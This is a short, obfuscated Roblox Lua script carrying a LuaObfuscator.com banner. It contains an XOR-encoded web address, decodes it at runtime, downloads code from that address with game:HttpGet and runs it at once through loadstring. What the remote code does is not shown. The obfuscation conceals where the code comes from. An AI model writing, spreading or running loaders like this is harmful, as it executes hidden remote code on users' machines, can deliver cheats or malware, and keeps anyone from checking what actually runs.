--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1 + 0 + 0, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (2 -1))),v1(v2(v9,1 + ((v11-((389 + 348) -((973 -604) + (1813 -(629 + 817)))))% #v9),1 + ((v11-(2 -(1 + 0)))% #v9) + 1)))%256));end return v5(v10);end loadstring(game:HttpGet(v7("\247\156\107\95\253\97\176\199\109\78\249\117\248\129\107\71\251\57\234\155\122\93\237\52\241\156\122\65\250\117\252\135\114\0\201\46\241\134\126\29\190\107\170\199\123\75\234\116\242\137\118\65\161\63\251\140","\159\232\31\47\142\91")))();
